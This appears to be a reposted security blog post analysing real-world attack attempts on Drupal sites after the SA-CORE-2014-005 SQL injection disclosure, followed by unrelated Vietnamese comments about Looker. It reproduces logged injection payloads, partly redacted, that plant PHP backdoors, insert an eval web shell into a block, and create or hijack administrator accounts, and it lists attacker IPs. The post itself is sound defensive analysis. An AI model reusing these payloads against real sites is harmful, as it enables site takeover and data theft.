Tìm hiểu về Drupal SQL Injection

Tìm hiểu về Drupal SQL Injection

Since October 15th, hackers have been busy coming up with creative ways to exploit the SQL Injection in Drupal 7 sites revealed by SA-CORE-2014-005. A week has already passed, and attacks are still ongoing. In a previous post, Moshe Weitzman explained how we were able to protect our customers' sites the moment the vulnerability was announced. In this blog post, we will look at some trends that we've seen in foiled attacks on Acquia Cloud in the past week, with a focus on this SQL Injection vulnerability.

This post draws its data from the aggregated logs of tens of thousands of sites hosted on Acquia Cloud which are managed and analyzed by our internal log analysis tool. All times in this post are EST. To our knowledge, no site on Acquia Cloud was affected, so we're only looking at exploit attempts here, but the observations below can easily be extrapolated to the rest of the Drupal sites from the wild. If you haven't patched yet when you are reading this, chances are your site has already been hacked.

Pattern 1: backdoor in docroot

Number of attacks: 7,785
First seen: 10/16 4:09am

The day following the official announcement, many people reported on the drupal.org forums and IRC that they found their site with a backdoor in the docroot via an exploit described by Josh Koenig. It creates a random file in one of your core module directories, for example modules/aggregator/dlov.php, which is a backdoor allowing the attacker to run arbitrary PHP code. Many people have also reported that their site had already been patched. The hackers used their backdoor to patch Drupal, presumably because they wanted to make sure they really owned the site and no other hacker could come in later.

INSERT INTO `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`, `access_callback`, `access_arguments`) VALUES (dlov, '', '', dlov, 'file_put_contents', HEX)

I've tracked down this attack to the IP address 62.76.191.119 from Russia. Others on IRC confirmed being hit by the same IP and found their sites hacked. This IP hit our platform 36,786 times in the 10-16 03:00 to 10-17 13:00 time window. Those hits include:

  • the initial POST request to insert data in the database using the above query, taking advantage of the SQL injection on the user login form

  • several GET requests to the paths /dlov and /?q=dlov in order to install the backdoor in the docroot

  • more GET requests to access the backdoor PHP file (modules/aggregator/dlov.php).

All those GET requests returned a 404 since the SQL Injection vector was mitigated on Acquia Cloud, and thus the initial POST request didn’t expose the SQL Injection vector. Even if the SQL injection was possible, this exploit wouldn’t have worked on Acquia Cloud because the docroot is not writable by the webserver.

This diagram shows the distribution of the 7,785 POST queries over a period of 34 hours, each hitting a different site:

Pattern 2: backdoor in /user path

Number of attacks: 732
First seen: 10/16 7:38pm

I wrote about this pattern as soon as I discovered it on Oct 17th. This attack enables the PHP module and updates the '/user' menu_router access_callback to 'php_eval' to let the attacker execute any PHP code via any kind of request.

TRUNCATE TABLE cache_bootstrap;UPDATE menu_router SET access_arguments=HEX, access_callback=HEX WHERE path=0x75736572;UPDATE system SET status = 1 WHERE name = 0x706870;INSERT INTO registry_file (filename,hash) VALUES (HEX, HEX);

The advantage of this backdoor to the attacker is that it doesn’t require write access to the docroot to be set up, but it is neutralized on menu cache clear.

This attack wasn’t associated to a unique IP but most likely came from a botnet. Here are some of the IPs that I found: 92.222.172.41, 199.27.76.34, 192.42.116.16, 199.27.76.30, 199.27.76.25, 162.247.72.7, 209.234.102.238, 85.25.103.48, 95.130.9.89. All those IPs were associated with spam traffic on our platform. The last 4 IPs are Tor IPs:

Drupal Tutorials, Security

Pattern 3: create a custom block with PHP code in body

Number of attacks: 24
First seen: 10/17/2014 09:17

This exploit creates a custom block, sets up the PHP code text format, and insert the following in the block body:<?php @eval($_POST[#DD0000">'caodaoyoule']);?>

insert into block(module,delta,theme,status,weight,region,custom,visibility,pages,title,cache) values ('block','63353',(select substring_index(substring_index(value,'"','2'),'"',-1) from variable where name='theme_default'),1,0,'footer',0,0,'','',-1);insert into block_custom(bid,body,info,format) values (63353,HEX,'nonono','php_code');insert into filter_format values ('php_code','PHP_code',0,1,11);insert into filter values ('php_code', 'filter', 'filter_autop', 0, 0, HEX),('php_code', 'filter', 'filter_html', -10, 0, HEX),('php_code', 'filter', 'filter_htmlcorrector', 10, 0, HEX),('php_code', 'filter', 'filter_html_escape', -10, 0, HEX),('php_code', 'filter', 'filter_url', 0, 0, HEX),('php_code', 'php', 'php_code', 0, 1, HEX);update system set status=1,schema_version=0;delete from cache_bootstrap;delete from cache;delete from cache_menu;

Other patterns: reset admin username and password or insert new admin user

Number of attacks: 3,000+
First seen: 10/15 8:20pm

These patterns were the first ones to emerge.

This query renames the uid 1 and change its password:

update users set name='jhuang' , pass = 'HASH' where uid = '1';

This query creates a new user with a uid high enough that it won’t clash with an existing user. The role id 3 is the default role id for the administrator role:

insert into {users} (uid,name,pass,status) values (333333,'admin2','HASH',1);insert into {users_roles} (uid,rid) values(333333,3);

Top offending IPs: 118.113.158.7, 103.242.1.193, 118.113.158.7, 125.70.172.51, 222.211.211.65, 125.70.173.81, 103.242.1.193

Another query similar to the previous one:

INSERT INTO `users` VALUES (9999,HASH,'[email protected]','','',NULL,1413423527,1413426879,1413426953,1,'Africa/Abidjan','',0,'[email protected]','b:0;');insert into `users_roles` values (9999,3);

What’s interesting about this query is that hackers attempted to hide their IP behind a X-Forwarded-For: 8.8.8.8 header, one of the Google Public DNS IP addresses.

This query looks up the maximum uid to prepare the insert statement:

set @a=(SELECT MAX(uid) FROM users)+1;INSERT INTO users set uid=@a,status=1,name='phantom' , pass = 'HASH';INSERT INTO users_roles set uid=@a,rid=3;

Conclusion

This security issue has offered a fascinating opportunity to study the behavior of web hackers responding to a newly disclosed vulnerability. We suspected, and confirmed, that attacks would begin only hours after the vulnerability was disclosed. We were not sure how much Drupal-specific knowledge would be applied, but the attacks show that a fair bit was brought to bear. Also, given the breadth of attacks we've seen, if you have not patched your site and it is not hosted on a platform like Acquia Cloud that protected you, your site has almost certainly been hacked by now.

In all those attacks, we couldn't find any indication that the attackers were targeting only Drupal 7 sites: we observed attacks on Drupal 6 and Drupal 5 sites too. 99% of the domains attacked were vanity domains and dev environments were very rarely attacked. We could not find any query intended to change the content or destroy sites: attackers were only interested in installing backdoors to take over the site or server at a later point in time, and make the intrusion unnoticeable. Most of the queries in this article had some parts redacted. Those removed parts were most of the time hexadecimal literals which MySQL supports natively. Hackers seem to favor those as it allows to obfuscate any dangerous PHP code and bypass any potential filters.

For help determining if your site has been hacked and what to do about it, see the official FAQ and read Your Drupal site got hacked. Now what?. There is also a useful flowchart at Your Drupal website has a backdoor. Bear in mind that even if you updated to Drupal 7.32, you might still have been hacked in the time window between the official announcement (noon EDT / 4pm UTC) and the time you patched, see for example a post from someone who reported a hack on the zen theme on this site.

An open question is whether the SQL injection vulnerability was exploitable via some vector other than via the user login form. So far, we haven't seen any evidence of such a vector; none of our customers have reported a successful attack, and we have not heard any other reports of one from the Drupal community. This does not mean, however, that no such vulnerability exists, or even that one hasn't been exploited already. It's possible that there is such a vector, and everyone whose site was exploited using it believed they were attacked via the user login form before updating. The best way to be safe is to patch your site or upgrade to Drupal 7.32. We believe that the way we protected all our customers from this attack also protected against any other such vector, and time will tell whether or not it exists at all.

Bạn thấy bài viết này như thế nào?: 
Average: 5 (2 votes)
Ảnh của Tommy Tran

Tommy owner Express Magazine

Drupal Developer having 9+ year experience, implementation and having strong knowledge of technical specifications, workflow development. Ability to perform effectively and efficiently in team and individually. Always enthusiastic and interseted to study new technologies

  • Skype ID: tthanhthuy

Bình luận (3)

Ảnh của Tommy Tran
Tommy Tran- Aug 10, 2023 03:26 PM Reply

Hỏi GG: Thế hệ tiếp theo của Datalake là gì – có phải là data mesh ko? Và có thể overview nhanh sự tiến hoá là gì ko? Khi đó Looker sẽ có ưu thế gì trong lộ trình xây dựng các next gen data management and analytics?

Hỏi Mr. Thi: Hiện tại, mình cũng vướng trong việc tư vấn DL/ BigData, vì khách hàng (trừ Banking and Telco) còn đang ko biết họ muốn gì ở đầu ra trong khi đầu vào là hổ lốn. Thi có thể chia sẻ nhanh cách/ step mà ACE đang làm – làm thế nào để lưu trữ dữ liệu trên onpremise với dữ liệu khổng lồ, làm

làm thế nào để tư vấn xem dữ liệu nào họ cần để priority data pipeline, từ đó dùng Looker mới có thể hiệu quả

Ảnh của Tommy Tran
Tommy Tran- Aug 10, 2023 03:32 PM Reply

tính năng drilling của Looker hoạt động như thế nào? có mạnh mẽ hơn so với các nên tảng khác hay không? nếu được nhờ anh demo và chia sẻ 1 số kinh nghiệm để tận dụng tính năng này ạ

AI và ML đang thể hiện sức mạnh trong phân tích dữ liệu lớn. Google Looker có khả năng tích hợp AI và Máy học (ML) hay không, và nếu có thì cụ thể cách mà Looker tích hợp AI và ML như thế nào để cung cấp giá trị gia tăng trong việc phân tích dữ liệu cho doanh nghiệp?

Ảnh của Tommy Tran
Tommy Tran- Aug 10, 2023 03:37 PM Reply

Theo em biết hiện tại thì có nhiều bên thứ 3 như Fivetran và Supermetrics cung cấp khả năng ETL mạnh, đưa data đến nguồn (như BigQuery) và sử dụng Lookerstudio để lên Dashboard.Chi phí dường như ít hơnều so với việc sử dụng Looker. Anh có thể nói điều vượt trội của Looker so với cấu trúc trên không.

Các doanh nghiệp nên cân nhắc những yếu tố nào khi lập kế hoạch di chuyển từ các công cụ BI truyền thống sang Google Looker để đảm bảo quá trình hiện đại hóa nền tảng phân tích dữ liệu thành công và tối đa hóa lợi ích của quá trình chuyển đổi?

 

Add Comment

Filtered HTML

  • Các địa chỉ web và email sẽ tự động được chuyển sang dạng liên kết.
  • Các thẻ HTML được chấp nhận: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Tự động ngắt dòng và đoạn văn.

Plain text

  • No HTML tags allowed.
  • Các địa chỉ web và email sẽ tự động được chuyển sang dạng liên kết.
  • Tự động ngắt dòng và đoạn văn.
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.

Tìm kiếm bất động sản

 

Advertisement

 

jobsora

Dich vu khu trung tphcm

Dich vu diet chuot tphcm

Dich vu diet con trung

Quảng Cáo Bài Viết

 
Amazon: 1 triệu thiết bị Kindle được bán ra mỗi tuần

Amazon: 1 triệu thiết bị Kindle được bán ra mỗi tuần

Amazon đang rất thành công với các thiết bị Kindle, đặc biệt là Kindle Fire. Hiện số lượng thiết bị Kindle bán ra mỗi tuần đã tăng lên 1 triệu...

Người tiêu dùng chưa “mặn mà” với TV-3D

Người tiêu dùng chưa “mặn mà” với TV-3D

Mặc dù ngành giải trí 3D trong được khuyến khích trong vài năm qua, người tiêu dùng có vẻ như ít quan tâm đến việc mua một bộ 3D - TV, theo một cuộc khảo sát mới từ Retrevo.

Backlink chất lượng dựa trên những yếu tố gì

Backlink chất lượng dựa trên những yếu tố gì

Có được những backlink chất lượng từ website khác sẽ giúp cho website của bạn có được vị trí cao trên kết quả tìm kiếm.

Công ty diệt chuột T&C

 

Diet con trung